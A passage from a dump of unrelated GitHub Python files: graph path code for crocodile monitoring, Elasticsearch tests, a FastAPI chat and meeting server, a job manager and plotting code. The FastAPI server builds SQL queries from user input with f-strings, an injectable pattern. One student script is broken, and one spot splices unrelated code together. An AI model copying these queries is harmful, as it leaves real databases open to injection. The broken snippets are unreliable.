in points list\n for index in range(0, len(self.points)):\n if self.points[index ]== a:\n indexa=index\n if self.points[index] == b:\n indexb = index \n \n #Find all paths a to b - Select direct routes only, no cycles or backtracking \n self.FindAllPaths(a, b)\n print(f\"\\nAll possible paths from {a} to {b}: \")\n for p in self.paths:\n print(p)\n \n #Find shortest route from path options \n path, shortest = self.findPath(a, b)\n print(\"\\nShortest path: \", path,\" - Distance: %.2f\"%shortest)\n \n # Add side points to inspect\n #include all nodes that are linked to (neighbour of) any internal point on path (ie point crocodiles can enter) \n # between a and b - this may add backtracking\n \n #Add neighbours of each location except the starting and ending location\n for i in range(1, len(path)-1):\n \n #add path[i] into the pointlist then search for neighbours\n pointList.insert(len(pointList)-1,path[i])\n expath.insert(len(expath)-1,path[i])\n \n #check its index and neighbours\n j = self.points.index(path[i])\n \n for k in range(len(self.points)):\n #if points[k] is a nearest neighbour then add it up to the pointlist\n if self.matrix[j][k] != 0:\n if (self.points[k] not in pointList) and (self.points[k] not in path):\n #add the neighbour into point list\n pointList.insert(len(pointList)-1,self.points[k])\n #add the neighbour into exhaustive path, example i to k and k back to i\n expath.insert(len(expath)-1,self.points[k])\n expath.insert(len(expath)-1,path[i]) #backtrack\n \n #Example findScope (\"15\",\"18\") Dr. 
Cat's comment\n        #paths are [15,16,18] and [15,16,17,19,20]\n        #shortest path [15,16,18]\n        #add neighbours [15,16,17,18]\n        \n        #This is the exhaustive list of points rangers need to inspect\n        return pointList, expath\n\n    \n    \"\"\"\n    Function: InitGraph(self, a, b)\n    Purpose: initialize all the parameters for a specific instance of the graph.\n    Input: name location a and b\n    Output: none\n    Example: InitGraph(\"15\", \"18\")\n    \n    This function will initialize the parameters below:\n    self.d set to infinity for all items, assuming the shortest path to each vertex is unknown\n    self.Trace set to -1 for all vertices\n    self.Free set to True for all vertices \n    self.paths set to an empty list\n    self.Start will be the index of location a\n    self.Finish will be the index of location b\n    \n    setting d[Start] = 0 means the shortest path from Start to Start is 0\n    \n    \"\"\"\n    def InitGraph(self, a, b):\n        \n        n = len(self.points)\n        MAX = 1000000\n        self.d = [MAX]*(n)\n        self.Trace = [-1]*(n)\n        self.Free = [True]*(n) \n        self.paths = []\n        \n        #set the starting and finishing location\n        self.Start = self.points.index(str(a))\n        self.Finish = self.points.index(str(b))\n        \n        #shortest path from Start to Start is 0\n        self.d[self.Start] = 0 \n    \n    \"\"\"\n    Function: FindAllPaths(self, a, b)\n    Purpose: find all possible paths from a to b\n    Input: location a and b \n    Output: None\n    Example: FindAllPaths (\"15\",\"18\")\n\n    This function will call InitGraph with the first and second location to initialize all the \n    parameters for the graph\n    \n    Then it will call the Try function to start traversing from a, and find all possible paths from\n    a to b. All the parameters will be updated once the Try function completes.\n    \n    \"\"\"\n    def FindAllPaths(self, a, b):\n        \n        self.InitGraph(a, b)\n        self.Try(self.Start)\n    \n    \n    \"\"\"\n    Function: Try(self, a)\n    Purpose: traverse the locations on map\n    Input: location a \n    Output: None\n    Example: Try(\"15\")\n    \n    This is a recursive function: given a starting vertex it traverses all \n    unvisited adjacent vertices; whenever it reaches the target vertex the full path is recorded,\n    and it backtracks once a vertex has no free neighbours\n    \n    \"\"\"\n    def Try(self, a):\n        \n        self.Free[a] = False\n        #check for all other vertices\n        for u in range(len(self.points)):\n            #if adjacent and is not visited.\n            if self.matrix[a][u] != 0 and self.Free[u] == True:\n                #trace the path\n                self.Trace[u] = a\n                #if the vertex u is the target\n                if u == self.Finish: \n                    path =[]\n                    #trace the full path\n                    while self.Start != u:\n                        path.append(self.points[u])\n                        u = self.Trace[u] \n                    path.append(self.points[self.Start])\n                    path.reverse()\n                    #track the path into the array of paths, then keep\n                    #scanning the remaining neighbours for further paths\n                    self.paths.append(path) \n                else:\n                    #recurse into vertex u since it is not the target. 
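Free[u] is restored to True after the recursive call below so that u can appear again in other paths.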
\n self.Try(u)\n self.Free[u] = True \n return \n \n\n\"\"\"\nFunction: Question1()\n\n\"\"\" \ndef Question1():\n \n print(\"\\nQuestion 1 - Exhaustive path and compute Costing: \")\n print(\"Assumption:\\nGiven two locations, we find the shortest path between these locations.\\nThen we find all points on this path and build the exhaustive path for rangers to inspect.\\nExhaustive path is built based by adding the neighbours of internal points on shortest path\")\n print(\"\\nInput two locations, example: 15 and 18\")\n location1 = input(\"Location 1: \")\n location2 = input(\"Location 2: \")\n \n cm.computeCosting(location1, location2)\n input(\"\\nPress Enter to continue...\")\n \n\"\"\"\nFuntion: Question2()\n\n\"\"\"\ndef Question2():\n \n print(\"\\nQuestion 2 - Improve Distance: \")\n print(\"\\nAssumption:\\nGiven two locations, we find the shortest path between these locations.\\nThen we traverse from the begining point to other points on the path until we reach any point having its neighbours (possibly to put the block) and calculate the ratio of its distance against the shortest path distance.\\nRangers will decide whether it is worth to put the blockage.\")\n print(\"\\nInput two locations, example: 19 and 22\")\n location1 = input(\"Location 1: \")\n location2 = input(\"Location 2: \")\n \n points = cm.improveDistance(location1, location2)\n \n if len(points) == 0:\n print(\"There is no any neighbour for any location within the shortest path. Rangers consider to place the blockage on any point in the path or elsewhere...\")\n else:\n print(\"Possible locations for rangers to consider to place a blockage: \")\n for p in points:print(p)\n \n input(\"\\nPress Enter to continue...\")\n \n\"\"\"\nFunction: Question3()\n\n\"\"\" \ndef Question3():\n \n print(\"\\nQuestion 3 - MinTime: \")\n print(\"\\nInput two locations, example: 19 and 22\")\n location1 = input(\"Location 1: \")\n location2 = input(\"Location 2: \")\n path, trace, distance,time = cm.minTime(location1, location2)\n print(\"\\nPoints travelled through the shortest path: \",path)\n for t in trace:\n print(t)\n print(\"Total distance (km): %.2f\"%distance)\n print(\"Time value (units of hour): %.2f\" %time)\n \n print(\"\\nQuestion 3 - Extension\")\n print(\"Assumption:\\nGiven the radius we find the nearest location to the beach. Then we find all the shortest paths from other points within radius of the beach to that nearest point and the accumulated number of crocs. Ranger will consider where to put the blockage. \")\n print(\"\\nInput the beach and radius. For example B3 and 10\")\n beach = input(\"Beach: \")\n radius = int(input(\"Radius: \"))\n list = cm.countCroc(beach,radius)\n \n point, paths = cm.locateOptimalBlockage(beach, radius,list)\n if point != \"\":\n print(f\"\\nNearest point to the beach {beach} is: {point}\")\n print(\"Shortest path from other points within radius of the beach to the nearest point is below.\\nRangers will consider to put the blockage\")\n for p in paths:\n print(p[0],\"-\", p[1])\n else:\n print(f\"No points within the radius of {radius} of {beach}\")\n \n input(\"\\nPress Enter to continue...\")\n \n \n#Driver code \nif __name__ == '__main__':\n \n cm=CrocMonitor(size) \n \n \"\"\"\n Dr. 
Cat Kutay's examples\n \n #print (cm.locationList)\n #Changed examples\n cm.computeCosting(\"15\",\"18\")\n \n # exhaustive path is [15,16, 17,16, 18] so return the length of this as unit cost - note data changes in Locations.csv\n #algorithm to find scope of spanning tree is provided as findScope()\n cm.improveDistance(\"15\",\"18\")\n #output will be 16 Ratio is \"original distance on [15,16,18]:0\"\n cm.locateOptimalBlockage(\"15\", \"18\")\n #returns 16 as other routes have alternative paths\n #may use other data to decide optimum path, but explain in requirements for this method\n cm.minTime(\"15\", \"18\") \n #returns [15,16,18] and time to travel that path\n \n \"\"\"\n \n Choice = \"\"\n Options ={\"1\":Question1,\"2\":Question2,\"3\":Question3} \n while True:\n print(\"\\nPress following key for the questions.\")\n print(\"1 for Question 1 - Exhaustive Path and Compute Costing\\n2 for Question 2 - Finding points to be blocked\\n3 for Question 3 - Couting Crocs and Optimum Blockage\\nOr any key to exit...\")\n Choice = input(\"Your input: \")\n if Choice not in Options:\n break\n #call the respective function\n Options[Choice]()\n print(\"Program End!!!\") \n\n ","repo_name":"phuphan13/Path-Algorithms-Crocodile-Monitoring","sub_path":"HIT 220_Assignment3_CrocMonitorExample_Group_3.py","file_name":"HIT 220_Assignment3_CrocMonitorExample_Group_3.py","file_ext":"py","file_size_in_byte":27370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73498427719","text":"# coding: utf-8\nimport unittest\nimport time\nimport os\n\nfrom elasticsearch import Elasticsearch, helpers\nfrom elasticsearch_dsl import Search, Q, Index\n\nfrom elasticlog import Elasticlog\n\nHOST = os.environ.get('TEST_HOST', 'localhost')\nINDEX_NAME = 'index1'\n\ndef fixtures():\n TYPE = 'log_type'\n bulk_data = [\n {'_source': {'created_at':'2015-01-10', 'filename': 'views', 'level': 'ERROR', 'message': 'elasticsearch.exceptions.ConnectionError: ConnectionError'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-01-02', 'filename': 'custom_views', 'level': 'ERROR', 'message': 'NameError: name \"request\" is not defined'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-04-04', 'filename': 'models', 'level': 'DEBUG', 'message': 'AttributeError: \"str\" object has no attribute \"xpto\"'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-02-21', 'filename': 'core.views', 'level': 'INFO', 'message': 'IndexError: list index out of range'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-03-08', 'filename': 'util', 'level': 'DEBUG', 'message': 'MissingSchema: Invalid URL \"gustavo\": No schema supplied. 
Perhaps you meant http://gustavo?'}, '_index': INDEX_NAME, '_type': TYPE},\n        {'_source': {'created_at':'2015-02-01', 'filename': 'api.views', 'level': 'ERROR', 'message': 'ERROR:django.request:Internal Server Error'}, '_index': INDEX_NAME, '_type': TYPE}\n    ]\n    es = Elasticsearch(hosts=[HOST])\n    helpers.bulk(es, bulk_data)\n    time.sleep(2)\n\n\nclass TestElasticlog(unittest.TestCase):\n\n    def setUp(self):\n        self.es = Elasticlog(hosts=[HOST], index=INDEX_NAME)\n\n    def tearDown(self):\n        Index(INDEX_NAME).delete()\n\n    def test_should_insert_data(self):\n        inserted = self.es.insert(filename='views.py', level='error', created_at='2015-07-18', message='object not found')\n        self.assertTrue(inserted)\n\n    def test_should_insert_empty_date_if_it_is_invalid(self):\n        inserted = self.es.insert(filename='views.py', level='error', created_at='invalid', message='object not found')\n        self.assertTrue(inserted)\n\n    def test_should_list_the_first_ten(self):\n        fixtures()\n\n        logs = self.es.search()\n        self.assertEquals(6, len(logs))\n\n        log = logs[0]\n        self.assertTrue(len(log.id) > 0)\n        self.assertEquals(log.level, 'ERROR')\n        self.assertEquals(log.filename, 'views')\n        self.assertEquals(log.message, 'elasticsearch.exceptions.ConnectionError: ConnectionError')\n\n    def test_should_paginate_the_result(self):\n        fixtures()\n\n        logs = self.es.search(page=1, per_page=2)\n        self.assertEquals(2, len(logs))\n\n        log = logs[0]\n        self.assertTrue(len(log.id) > 0)\n        self.assertEquals(log.level, 'ERROR')\n        self.assertEquals(log.filename, 'views')\n        self.assertEquals(log.message, 'elasticsearch.exceptions.ConnectionError: ConnectionError')\n\n    def test_should_sort_asc(self):\n        fixtures()\n        logs = self.es.search(sort='created_at')\n        log = logs[0]\n        self.assertEquals(str(log.created_at), '2015-01-02 00:00:00')\n        self.assertEquals(log.level, 'ERROR')\n        self.assertEquals(log.filename, 'custom_views')\n        self.assertEquals(log.message, 'NameError: name \"request\" is not defined')\n\n    def test_should_sort_desc(self):\n        fixtures()\n        logs = self.es.search(sort='-created_at')\n        log = logs[0]\n        self.assertEquals(str(log.created_at), '2015-04-04 00:00:00')\n        self.assertEquals(log.level, 'DEBUG')\n        self.assertEquals(log.filename, 'models')\n        self.assertEquals(log.message, 'AttributeError: \"str\" object has no attribute \"xpto\"')\n\n    def test_should_filter_by_date_interval(self):\n        fixtures()\n        logs = self.es.search(start='2015-01-01T00:00:00', end='2015-02-21T00:00:00')\n        self.assertEquals(4, len(logs))\n\n        log = logs[0]\n        self.assertEquals(str(log.created_at), '2015-01-10 00:00:00')\n        self.assertEquals(log.level, 'ERROR')\n        self.assertEquals(log.filename, 'views')\n        self.assertEquals(log.message, 'elasticsearch.exceptions.ConnectionError: ConnectionError')\n\n    def test_should_raises_exception_if_pass_an_invalid_date_interval(self):\n        fixtures()\n        with self.assertRaises(Exception):\n            self.es.search(start='invalid', end='2015-02-21')\n\n    def test_should_count_the_total_of_logs(self):\n        fixtures()\n        response = self.es.count()\n        self.assertEquals(response.get('count'), 6)\n\n\nclass TestTimeoutElasticlog(unittest.TestCase):\n\n    def test_should_abort_if_waiting_for_long_time(self):\n        es = Elasticlog(hosts=['172.17.0.254'], index='loggo', timeout=1, max_retries=0)\n        with self.assertRaises(Exception):\n            es.insert(filename='views.py', level='error', created_at='invalid', message='object not found')\n\n\nif __name__ == '__main__':\n    
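# set the TEST_HOST environment variable first if Elasticsearch is not on localhost.\n    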
unittest.main()\n","repo_name":"gustavohenrique/elasticlog","sub_path":"elasticlog/test_elasticlog.py","file_name":"test_elasticlog.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"7187412725","text":"a=['rishabh-meerut','imtiyaz-delhi','nilima-cochin','rati-shimla','ayishah-delhi',\n\"raghu-shimla\",'naseer-kanpur','kartikeya-delhi','salma-jaipur','pankaj-delhi',\n'bjijesh-delhi']\n# f=open('qtion4.txt','a')\nfor i in a:\n f=open(\"delhi.txt\",\"a\")\n if i==\"delhi\":\n f.append(i)\n if i==\"simls.txt\":\n f.append(i)\n f.close()\n\n# i=0\n# while i area = {area} px^2, ideal perimeter {ideal_perimeter} px, measuerd perimeter: {perimeter} px, ratio: {ratio}\")\n\n\"\"\"asymmetry\"\"\"\n(top_up, top_down, top_left, top_right) = crop.crop_image(filtered_mole, round(filtered_mole.shape[0]/2), round(filtered_mole.shape[1]/2))\nfiltered_mole = filtered_mole[top_up:top_down,top_left+1:top_right,:]\n(x,y) = asy.center_mole(filtered_mole,top_up, top_down, top_left, top_right)\nasy.ratio(filtered_mole,x,y)\n","repo_name":"jacopobr/features-extraction-moles-dataset","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"38309808733","text":"# student number\nn = int(input())\n\nkem_grade = []\nfor _ in range(n):\n name, kor, eng, math = input().split()\n kem_grade.append((name, int(kor), int(eng), int(math)))\n\nkem_grade.sort(key=lambda x: (-int(x[1]), int(x[2]), (-int(x[3])), x[0]))\n\n# print name\nfor student in kem_grade:\n print(student[0])","repo_name":"hunsoo0823/python_algorithm_second","sub_path":"sort/kem.py","file_name":"kem.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23378248267","text":"from fastapi import FastAPI, Request, WebSocket, WebSocketDisconnect\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom pydantic import BaseModel\nfrom databases import Database\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom typing import List\nimport json\n\napp = FastAPI()\n\norigins = [\"*\"]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.mount(\"/static\", StaticFiles(directory=\"MeetingPage/static\"), name=\"static\")\n\ntemplates = Jinja2Templates(directory=\"MeetingPage/templates\")\n\n\n@app.get('/')\ndef home():\n return 'Hello world'\n\n\n@app.get(\"/meeting/{code}\")\ndef meeting(request: Request, code: str):\n return templates.TemplateResponse('Chatting.html', {\"request\": request, \"code\": code})\n\n\nclass ConnectionManager:\n def __init__(self):\n self.active_connections: List[WebSocket] = []\n\n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connections.append(websocket)\n\n def disconnect(self, websocket: WebSocket):\n self.active_connections.remove(websocket)\n\n async def send_personal_message(self, message: str, websocket: WebSocket):\n await websocket.send_text(message)\n\n async def broadcast(self, message: str):\n for connection in self.active_connections:\n await connection.send_text(message)\n\n\nmanager = ConnectionManager()\n\n\n@app.websocket(\"/ws/{client_id}\")\nasync def websocket_endpoint(websocket: WebSocket, 
client_id: str):\n await manager.connect(websocket)\n try:\n while True:\n data = await websocket.receive_text()\n # await manager.send_personal_message(f\"You wrote: {data}\", websocket)\n datas = {'client_id': client_id, 'data': data}\n await manager.broadcast(json.dumps(datas))\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n await manager.broadcast(f\"Client #{client_id} left the chat\")\n\n\nclass Chat(BaseModel):\n message: str\n user: str\n time: str\n\n\nclass Room(BaseModel):\n title: str\n users: str\n password: str\n code: str\n record: str\n\n\nclass Memo(BaseModel):\n title: str\n content: str\n\n\ndatabase = Database(\"sqlite:///./database/database.db\")\n\n\n@app.on_event(\"startup\")\nasync def database_connect():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def database_disconnect():\n await database.disconnect()\n\n\n@app.post('/api/database/chatting')\nasync def post_chat_message(chat: Chat):\n chat_dict = chat.dict()\n\n query = \"INSERT INTO chat (message, user, time) VALUES (:message, :user, :time)\"\n results = await database.execute_many(query=query, values=[chat_dict])\n\n return results\n\n\n@app.get('/api/database/chatting')\nasync def get_chat_message():\n query = \"SELECT * FROM chat\"\n results = await database.fetch_all(query=query)\n\n return results\n\n\n@app.post('/api/database/meeting')\nasync def create_meeting_room(room: Room):\n room_dict = room.dict()\n\n query = \"INSERT INTO meeting_list (title, users, password, code, record) VALUES (:title, :users, :password, :code, :record)\"\n\n results = await database.execute(query=query, values=room_dict)\n\n return results\n\n\n@app.get('/api/database/meeting')\nasync def get_meeting_room(code: str):\n if code == '':\n query = \"SELECT * FROM meeting_list WHERE record = 'true'\"\n results = await database.fetch_all(query=query)\n else:\n query = f\"SELECT * FROM meeting_list WHERE code = '{code}'\"\n results = await database.fetch_one(query=query)\n return results\n\n\n@app.delete('/api/database/meeting/{meeting_num}')\nasync def delete_meeting_room(meeting_num: int):\n query = f\"DELETE FROM meeting_list WHERE number = {meeting_num}\"\n results = await database.execute(query=query)\n\n return results\n\n\n@app.post('/api/database/memo')\nasync def create_memo(memo: Memo):\n from datetime import datetime\n now = datetime.now()\n\n memo_dict = memo.dict()\n\n memo_title = memo_dict['title']\n memo_content = memo_dict['content']\n\n query = \"INSERT INTO memo (title, content, time) VALUES (:title, :content, :time)\"\n\n value = {\n 'title': memo_title,\n 'content': memo_content,\n 'time': str(now.date())\n }\n\n results = await database.execute(query=query, values=value)\n\n return results\n\n\n@app.get('/api/database/memo')\nasync def get_memo():\n query = \"SELECT * FROM memo\"\n results = await database.fetch_all(query=query)\n\n return results\n\n\n@app.delete('/api/database/memo/{memo_num}')\nasync def delete_memo(memo_num: int):\n query = f\"DELETE FROM memo WHERE number = {memo_num}\"\n results = await database.execute(query=query)\n\n return results\n","repo_name":"seokmin12/OnlineChatting","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12524859621","text":"from typing import Callable\nimport multiprocessing\nimport ozflux_logging\n\nclass Task:\n\t\"\"\"\n\tBase class for runnable classes.\n\t\"\"\"\n\tdef 
exec(self, pcb: Callable[[float], None]):\n\t\tpass\n\nclass _Job(multiprocessing.Process):\n\t\"\"\"\n\tRepresents a parallel job.\n\t\"\"\"\n\tdef __init__(self, id: int, weight: int\n\t \t, task: Task\n\t \t, progress_reader: multiprocessing.connection.Connection\n\t \t, progress_writer: multiprocessing.connection.Connection):\n\t\t\"\"\"\n\t\tCreate a new _Job instance.\n\n\t\t@param id: Unique ID assigned to this job (used for progress reporting).\n\t\t@param weight: Weighting of this job's progress relative to other jobs'.\n\t\t@param task: The function to be called which performs work.\n\t\t@param progres_reader: Read connection to the subprocess' stdout pipe.\n\t\t@param progres_writer: Write connection to the subprocess' stdout pipe.\n\t\t\"\"\"\n\t\tmultiprocessing.Process.__init__(self)\n\t\tself.id = id\n\t\tself.weight = weight\n\t\tself.task = task\n\t\tself.progress_reader = progress_reader\n\t\tself.progress_writer = progress_writer\n\t\tself.progress = 0.0\n\n\tdef _progress_local(self, progress: float, start: float, total_weight:float):\n\t\t\"\"\"\n\t\tProgress reporting function used when the job is run locally.\n\n\t\t@param progress: The new progress.\n\t\t@param start: The weight of all jobs completed before this one.\n\t\t@param total_weight: The total weight of all jobs.\n\t\t\"\"\"\n\t\tself.progress = progress\n\t\toverall = (start + self.weight * progress) / total_weight\n\t\tozflux_logging.log_progress(overall)\n\n\tdef run(self):\n\t\t# Do main processing.\n\t\tself.task.exec(lambda p: self.progress_writer.send( (p, self.id) ))\n\n\t\t# Close progress reporter pipe.\n\t\tself.progress_writer.close()\n\n\tdef run_local(self, start: float, total_weight: float):\n\t\t\"\"\"\n\t\tRun this job on the current thread (ie not in a separate process).\n\n\t\t@param start: Total weight of all jobs already finished.\n\t\t@param total_weight: Total weight of all jobs.\n\t\t\"\"\"\n\t\tself.task.exec(lambda p: self._progress_local(p, start, total_weight))\n\nclass JobManager:\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tCreate a new JobManager.\n\t\t\"\"\"\n\t\t# # True iff jobs are allowed to run in parallel. False otherwise.\n\t\t# self.allow_parallel = allow_parallel\n\n\t\t# Total weight of all jobs. Access to this is controlled by _weights_lock.\n\t\tself._total_weight: int = 0\n\n\t\t# List of all submitted jobs (not running jobs!).\n\t\tself._jobs: list[_Job] = []\n\n\t\tself._lock = multiprocessing.BoundedSemaphore(1)\n\n\tdef _progress_reporter(self, progress: float, id: int):\n\t\t\"\"\"\n\t\tThis function is called by the wait() function when a progress report is\n\t\treceived from one of the child processes.\n\n\t\t@param progress: Progress of this job in range [0, 1].\n\t\t@param id: ID of the job which has reported its progress.\n\t\t\"\"\"\n\n\t\tjob = self._jobs[id]\n\n\t\tweight = job.weight / self._total_weight\n\n\t\tjob.progress = weight * progress\n\n\t\t# No need to check if in parallel mode, as the mutex is easily\n\t\t# obtained when running in serial mode.\n\t\taggregate_progress = sum([j.progress for j in self._jobs])\n\t\tozflux_logging.log_progress(aggregate_progress)\n\n\tdef add_job(self, task: Task, weight: int = 1):\n\t\t\"\"\"\n\t\tRegister a job with the job manager. A job can be any function which\n\t\treports its progress.\n\n\t\tNo progress reporting will occur until wait() is called.\n\n\t\t@param task: The job's execution function. 
This is any function which\n\t\t\t\t\t reports progress via a callable argument.\n\t\t@param weight: Absolute weight for this job. Higher value means progress\n\t\t\t\t\tin this job counts for proportionately more out of the\n\t\t\t\t\taggregate progress of all jobs. The way that the weight is\n\t\t\t\t\tcalculated should be consistent over all jobs, and it must\n\t\t\t\t\tbe positive.\n\t\t\"\"\"\n\t\twith self._lock:\n\t\t\t# Get a job ID.\n\t\t\tjob_id = len(self._jobs)\n\n\t\t\t# Update job weights. Note that the newly-added job weight should have\n\t\t\t# index job_id.\n\t\t\tself._total_weight += weight\n\n\t\t\t# Create a pipe for 1-way communication (progress reporting).\n\t\t\treader, writer = multiprocessing.connection.Pipe(duplex = False)\n\n\t\t\t# Start the process.\n\t\t\tjob = _Job(job_id, weight, task, reader, writer)\n\n\t\t\t# Store the process handle for later use.\n\t\t\tself._jobs.append(job)\n\n\tdef _get_num_running_jobs(self):\n\t\t\"\"\"\n\t\tGet the number of currently running jobs.\n\t\t\"\"\"\n\t\treturn len([j for j in self._jobs if j.is_alive()])\n\n\tdef run_parallel(self, max_para: int = multiprocessing.cpu_count()):\n\t\t\"\"\"\n\t\tRun all jobs in parallel and wait for them to finish.\n\t\t@param max_para: Maximum number of jobs to run in parallel. Defaults to logical CPU count.\n\t\t\"\"\"\n\t\twith self._lock:\n\t\t\tfor job in self._jobs:\n\t\t\t\t# If number of running jobs exceeds available number of CPUs,\n\t\t\t\t# wait for one job to finish.\n\t\t\t\tnum_running = self._get_num_running_jobs()\n\t\t\t\tif num_running >= max_para:\n\t\t\t\t\tself._wait_until(lambda: self._get_num_running_jobs() < max_para)\n\n\t\t\t\tjob.start()\n\n\t\t\t\t# Close the writable end of the pipe now, to be sure that p is\n\t\t\t\t# the only process which owns a handle for it. This ensures that\n\t\t\t\t# when p closes its handle for the writable end, wait() will\n\t\t\t\t# promptly report the readable end as being ready.\n\t\t\t\tjob.progress_writer.close()\n\n\t\t\t\t# Wait until job starts, to prevent race conditions.\n\t\t\t\tself._wait_until(lambda: job.is_alive())\n\n\t\t\t# Wait until all jobs are finished.\n\t\t\tself._wait_until()\n\t\t\tfor process in self._jobs:\n\t\t\t\tprocess.join()\n\n\tdef run_single_threaded(self):\n\t\t\"\"\"\n\t\tRun all jobs one at a time, in the current thread, and wait for them to\n\t\tfinish.\n\t\t\"\"\"\n\t\twith self._lock:\n\t\t\tcum_weight = 0\n\t\t\tfor job in self._jobs:\n\t\t\t\t# The pipe connection is not required.\n\t\t\t\tjob.progress_reader.close()\n\t\t\t\tjob.progress_writer.close()\n\n\t\t\t\tjob.run_local(cum_weight, self._total_weight)\n\t\t\t\tcum_weight += job.weight\n\n\tdef _wait_until(self, condition: Callable[[], bool] = lambda: False):\n\t\t\"\"\"\n\t\tWait for all parallel jobs to finish running, or the given condition\n\t\treturns true. Note that no progress messages will be written until this\n\t\tis called.\n\n\t\t@param condition: Optional function which returns a bool. If this\n\t\tfunction returns true, waiting will cease. 
If no condition is given,\n\t\tthis function will wait until all jobs have finished.\n\t\t\"\"\"\n\t\treaders = [j.progress_reader for j in self._jobs if j.is_alive()]\n\t\twhile readers:\n\t\t\tfor reader in readers:\n\t\t\t\ttry:\n\t\t\t\t\tif condition():\n\t\t\t\t\t\treturn\n\t\t\t\t\tmsg = None\n\t\t\t\t\tif reader.poll():\n\t\t\t\t\t\tmsg = reader.recv()\n\t\t\t\t\t\t(progress, process_index) = msg\n\t\t\t\t\t\tself._progress_reporter(progress, process_index)\n\t\t\t\texcept EOFError:\n\t\t\t\t\treaders.remove(reader)\n\n","repo_name":"hie-dave/lpj-scripts","sub_path":"ozflux-lpjg/ozflux_parallel.py","file_name":"ozflux_parallel.py","file_ext":"py","file_size_in_byte":6518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"35647585675","text":"from datetime import datetime\n\nimport matplotlib.patches as patches\nfrom matplotlib.dates import DateFormatter\nfrom matplotlib.figure import Figure\n\n\nclass WeatherPlot(Figure):\n\n def __init__(self):\n super().__init__(figsize=(12, 8), dpi=90)\n self.__paramsPlot = [[u\"Temperatura [\\u00B0C]\", \"Ciśnienie [hPa]\", \"red\", \"blue\"],\n [\"Zachmurzenie [%]\", \"Wilgotność [%]\", \"grey\", \"orange\"]]\n self.__city = None\n self.__state = None\n self.__country = None\n self.__rot = 0\n\n def forecastPlot(self, data, city, state, country):\n self.__city = city\n self.__state = state\n self.__country = country\n processed = {\"time\": [], \"temp\": [], \"pressure\": [], \"clouds\": [], \"humidity\": []}\n for point in data[\"hourly\"]:\n date = datetime.fromtimestamp(point[\"dt\"])\n processed[\"time\"].append(date)\n processed[\"temp\"].append(point[\"temp\"])\n processed[\"pressure\"].append(point[\"pressure\"])\n processed[\"clouds\"].append(point[\"clouds\"])\n processed[\"humidity\"].append(point[\"humidity\"])\n self.__weatherPlot(processed, \"Prognoza\", \"%H:%M\\n%d.%m\")\n\n def historicalPlot(self, data, city, state, country):\n self.__city = city\n self.__state = state\n self.__country = country\n processed = {\"time\": [], \"temp\": [], \"pressure\": [], \"clouds\": [], \"humidity\": []}\n for point in data[\"hourly\"]:\n date = datetime.fromtimestamp(point[\"dt\"])\n processed[\"time\"].append(date.strftime(\"%H:%M\"))\n processed[\"temp\"].append(point[\"temp\"])\n processed[\"pressure\"].append(point[\"pressure\"])\n processed[\"clouds\"].append(point[\"clouds\"])\n processed[\"humidity\"].append(point[\"humidity\"])\n text = datetime.fromtimestamp(data[\"hourly\"][0][\"dt\"]).strftime(\"%d.%m.%y\")\n self.__rot = 45\n self.__weatherPlot(processed, text, None)\n\n def __weatherPlot(self, processed, text, dateformat):\n self.__addPlot(processed[\"time\"], processed[\"temp\"], processed[\"pressure\"], text, 211, 0, dateformat)\n self.__addPlot(processed[\"time\"], processed[\"clouds\"], processed[\"humidity\"], text, 212, 1, dateformat)\n\n def __addPlot(self, x, y, z, text, pos, i, dateFormat):\n a = self.add_subplot(pos)\n a.minorticks_on()\n a.tick_params(axis='x', labelrotation=self.__rot)\n if pos == 211:\n a.set_title(f\"{text}: pogoda dla {self.__city} - {self.__state} - {self.__country}\")\n a.set_ylabel(self.__paramsPlot[i][0])\n a.plot(x, y, self.__paramsPlot[i][2])\n if dateFormat is not None:\n a.xaxis.set_major_formatter(DateFormatter(dateFormat))\n\n b = a.twinx()\n b.minorticks_on()\n b.set_ylabel(self.__paramsPlot[i][1])\n b.plot(x, z, self.__paramsPlot[i][3])\n\n paramLeg1 = patches.Patch(color=self.__paramsPlot[i][2], 
